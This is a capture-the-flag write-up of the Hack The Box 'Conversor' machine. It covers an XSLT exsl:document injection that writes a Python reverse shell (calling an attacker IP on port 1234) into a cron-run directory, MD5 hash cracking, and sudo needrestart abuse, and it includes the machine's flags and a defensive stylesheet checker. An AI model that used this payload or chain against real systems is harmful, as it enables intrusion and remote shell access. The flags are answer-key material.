
Hack The Box

Conversor

HTB, Easy, Linux, Web, PrivEsc

Summary

Conversor is an Easy Linux machine hosting a web app that converts Nmap scans using XML/XSLT. The /about endpoint leaks the source code, revealing an XSLT processor and a cron job that runs any .py file in a scripts directory. An XSLT injection with exsl:document writes a malicious script that the cron job executes, granting a shell as www-data. A local SQLite database yields a crackable MD5 hash for SSH access, and a sudo rule on needrestart is abused to escalate to root.

Machine Information

Name       Difficulty  OS     Platform
Conversor  Easy        Linux  Hack The Box

Attack Path

  1. Service enumeration reveals HTTP and SSH.
  2. Web enumeration discovers the /about endpoint.
  3. The application source code is downloaded and analyzed.
  4. An XSLT injection (exsl:document) writes a file to the server.
  5. A cron job executes the written script.
  6. A reverse shell is received as www-data.
  7. Credentials are extracted from a SQLite database (MD5).
  8. SSH access is obtained as the user.
  9. A sudo rule on needrestart is abused to escalate to root.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.22.117

Nmap Scan

Port  Service  Notes
22    SSH      OpenSSH 8.9p1
80    HTTP     Conversor web application

Web Enumeration

The web application accepts XML and XSLT uploads to convert Nmap scans.

Web page

Content discovery was run with Gobuster:

gobuster dir -u http://conversor.htb/ -w /usr/share/wordlists/dirb/common.txt

Gobuster

Key findings:

The /about endpoint was essential, as it provided the application's source code.

Source Code Review

The source code revealed:

install.md contained a cron job:

* * * * * www-data for f in /var/www/conversor.htb/scripts/*.py; do python3 "$f"; done

In other words, any .py file placed in that directory is executed automatically.

Exploitation — XSLT Injection (exsl:document)

XSLT with the EXSLT exsl:document element can write files to disk during the transformation. This was used to drop a reverse shell into the scripts directory.

<xsl:stylesheet version="1.0"
 xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
 xmlns:exsl="http://exslt.org/common"
 extension-element-prefixes="exsl">

<xsl:template match="/">
  <exsl:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.X",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
  </exsl:document>
</xsl:template>

</xsl:stylesheet>
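A pre-check the converter could run on uploaded stylesheets before transforming them, as an added example (not the application's code and not part of the original writeup): it rejects extension elements such as exsl:document, xsl:import/xsl:include and document() calls. The names audit_stylesheet and split_tag and the allowed result namespaces are assumptions, and both samples are constructed.

```python
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
BLOCKED_XSL = {"import", "include"}  # instructions that load other stylesheets
ALLOWED_RESULT_NS = {"", "http://www.w3.org/1999/xhtml"}  # assumed output vocabularies

def split_tag(tag):
    """'{ns}local' -> (ns, local); tags without a namespace get ns ''."""
    return tuple(tag[1:].split("}", 1)) if tag.startswith("{") else ("", tag)

def audit_stylesheet(xslt_text):
    """Return a list of findings; an empty list means the stylesheet passed."""
    if "<!DOCTYPE" in xslt_text.upper():
        return ["DOCTYPE present (entity declarations are not needed here)"]
    try:
        root = ET.fromstring(xslt_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        ns, local = split_tag(el.tag)
        if ns == XSL_NS and local in BLOCKED_XSL:
            findings.append(f"xsl:{local} loads an external stylesheet")
        elif ns != XSL_NS and ns not in ALLOWED_RESULT_NS:
            findings.append(f"element '{local}' in foreign namespace {ns}")
        for name, value in el.attrib.items():
            if split_tag(name)[1] == "extension-element-prefixes":
                findings.append("extension-element-prefixes declared")
            if "document(" in "".join(value.split()):
                findings.append("document() call in an expression")
    return findings

# Constructed samples: same header as the stylesheet above, harmless body and path.
SAMPLE_EXT = """<xsl:stylesheet version="1.0"
 xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
 xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
<xsl:template match="/">
  <exsl:document href="/tmp/placeholder.txt" method="text">example</exsl:document>
</xsl:template></xsl:stylesheet>"""
SAMPLE_OK = """<xsl:stylesheet version="1.0"
 xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/"><html><body>
  <p><xsl:value-of select="/nmaprun/@args"/></p>
</body></html></xsl:template></xsl:stylesheet>"""

if __name__ == "__main__":
    for label, text in (("extension", SAMPLE_EXT), ("plain", SAMPLE_OK)):
        print(label, audit_stylesheet(text) or "clean")
```

This is a filter in front of the engine, not a replacement for restricting the engine itself. If the processor is lxml (an assumption, the page does not name it), etree.XSLT(doc, access_control=etree.XSLTAccessControl.DENY_ALL) also blocks file writes during the transform.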

Initial Access

After the payload was uploaded, the file was written to the scripts directory, the cron job executed it, and a reverse shell was received as www-data.

nc -lvnp 1234

Shell

A SQLite database was found containing user credentials:

sqlite3 /var/www/conversor.htb/instance/users.db
SELECT * FROM users;

Database hash

The MD5 hash was cracked and reused for SSH:

john --format=raw-md5 hash --wordlist=/usr/share/wordlists/rockyou.txt
ssh fismathack@10.129.22.117

Privilege Escalation

Enumeration

sudo -l

sudo enumeration

(ALL : ALL) NOPASSWD: /usr/sbin/needrestart

Abusing needrestart

The needrestart binary can be abused to execute code as root, which produced a root shell.

Root shell

Flags

User

cat /home/fismathack/user.txt

User flag

00f53b8888ecdc8814a01c18dd67f289

Root

cat /root/root.txt

Root flag

36003125b473a0efc65cd596ac974152

Vulnerabilities Identified

XSLT Injection → Arbitrary File Write → RCE

Impact: remote code execution as www-data.

Misconfigured sudo (needrestart)

Impact: privilege escalation to root.

Tools Used

Key Takeaways